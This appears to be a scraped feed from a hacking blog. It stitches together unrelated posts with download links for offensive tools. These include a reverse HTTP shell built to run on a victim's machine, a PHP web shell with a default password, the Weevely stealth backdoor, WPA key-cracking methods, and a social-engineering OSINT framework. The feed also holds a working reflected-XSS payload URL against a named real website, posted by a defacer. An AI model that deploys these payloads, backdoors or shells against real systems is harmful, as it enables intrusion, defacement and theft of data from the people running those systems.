Table of Contents

Introduction
Part 1: The Basics
What’s Shellcode?
The Types of Shellcode
Part 2: Writing Shellcode
Shellcode Skeleton
The Tools
Getting the Delta
Getting the Kernel32 imagebase
Getting the APIs
Null-Free byte Shellcode
Alphanumeric Shellcode
Egg-hunting Shellcode
Part 2: The Payload
Socket Programming
Bind Shell Payload
Reverse Shell Payload
Download & Execute Payload
Put All Together
Part 4: Implement your Shellcode into Metasploit
Conclusion
References
Appendix I – Important Structures

Info
http://www.codeproject.com/Articles/325776/The-Art-of-Win32-Shellcoding#ch2.1

Download source code
http://www.codeproject.com/KB/web-security/325776/win32-shellcode-src.zip

Cracking the pre-shared key in five different ways:
1. Use aircrack-ng (without CUDA support) to crack the pre-shared key (slow)
2. Use Pyrit and Cowpatty to crack key on the fly (passthrough mode using CUDA) (faster than way 1)
3. Use Pyrit alone to crack key on the fly (attack_passthrough mode) (faster than way 2 and is most recommended)
4. Pyrit CUDA Batch Mode – Create rainbow tables with pyrit
5. Brute force with Crunch and Pyrit (not recommended)

Download PDF
http://www.uploadarea.de/upload/rmm2kr87l97gbeogv82n2u324.html

Artillery is a honeypot/monitoring/prevention tool used to protect Linux-based systems. Artillery will setup multiple ports on the nix system and if anything touches it will automatically blacklist them. In addition, it monitors the filesystem for changes and emails the changes back to you. It also detects SSH brute force attacks and automatically blocks them as well.

Download
svn co http://svn.secmaniac.com/artillery artillery/
Then python install.py

Artillery with Artillery from Hackett on Vimeo.

Got a little bored today and decided to write a reverse HTTP shell in Python thats platform independent and supports AES encryption when passing information back and forth. So this works on Linux, OSX, and Windows. The shell also supports proxy settings as well. This Python shell will initiate a reverse connection out of the network and connect to the attacker machine via pure HTTP communications. It’s pretty straight forward on how it works. I’ve byte compiled the code so you do not need to have Python installed on the victim, it will simply run as a normal executable.

Download compiled shell.exe and all of the source code
https://www.secmaniac.com/files/encrypted_http_shell.zip

The OATH Toolkit contains a shared library, command line tool and a PAM module that makes it possible to build one-time password authentication systems. Supported technologies include the event-based HOTP algorithm and the time-based TOTP algorithm. OATH is the Open AuTHentication organization which specify the algorithms.

Download
http://download.savannah.gnu.org/releases/oath-toolkit/

John The Ripper(JTR), a Fastest command line password cracker tool. 'Johnny' is a GUI for John the Ripper.
This GUI version will be very helpful to those who struggle with Command line tool.


Download
http://openwall.info/wiki/john/johnny

This utility provides a Web interface for remote operation c operating system and its service / daemon.
Opportunity Description / features:

Authorization for cookies
Server Information
File manager (copy, rename, move, delete, chmod, touch, creating files and folders)
View, hexview, editing, downloading,
uploading files
Working with zip archives (packing, unpacking) + compression tar.gz
Console
SQL Manager (MySql, PostgreSql)
Execute PHP code
Working with Strings + hash search online databases
Bindport and back-Connect (Perl)
Bruteforce FTP, MySQL, PgSQL
Search files, search text in files
Support for * nix-like and Windows systems
Antipoiskovik (check User-Agent, if a search engine then returns 404 error)
You can use AJAX
Small size. The boxed version is 22.8 Kb
Choice of encoding, which employs a shell.

Info
Default password: root
(if you want to change it change the auth_pass variable value with your md5 encoded password.
http://pastebin.com/Qra8yeWX

Create: 2005-07-18
X-Scan is a general scanner for scanning network vulnerabilities for specific IP address scope or stand-alone computer by multi-threading method, plug-ins are supportable. Which X-Scan feature include in the following: service type, remote OS type and version detection, weak user/password pair, and all of the nessus attack scripts combination.

Download
http://xfocus.org/programs/200507/X-Scan-v3.3-en.rar

Domain:
de.predictor.fifa.com
URL:
hxxp://de.predictor.fifa.com/M/stats.mc?phase=2%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(%27XSS%20By%20Tur
KPoweR%20-%20FROM%20TURKEY%20-%20HELLO%20FIFA%20:D%27)%3B%3C/ScRiPt%3E%3Ch1%3EXSS%20By%20TurKPoweR%2
0-%20FROM%20TURKEY%20-%20HELLO%20FIFA%20%20:D%3C/h1%3E%3C/marquee%3E

by
TurKPoweR

The Skip Tracing Framework, online information including:

Domain name (DNS Information, Website information, Machine specific, company services in the cloud…)
IP addresses or network range Information(
Search information about company name
Full name, surname search tools
Email addresses of the target
Phone numbers that you can use for social engineering
Nickname search and information
Passwords hash online tools
Images reversing tools
URL information
Specialized search engines.

Info
http://makensi.es/stf/

Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and could be used like an hidden backdoor and as a useful telnet-like console replacement to manage web accounts, even if hosted in free hosting services. Just generate and upload the "server" PHP code on the target web server, and run Weevely client locally to transmit shell commands.

Download
http://code.google.com/p/weevely/downloads/list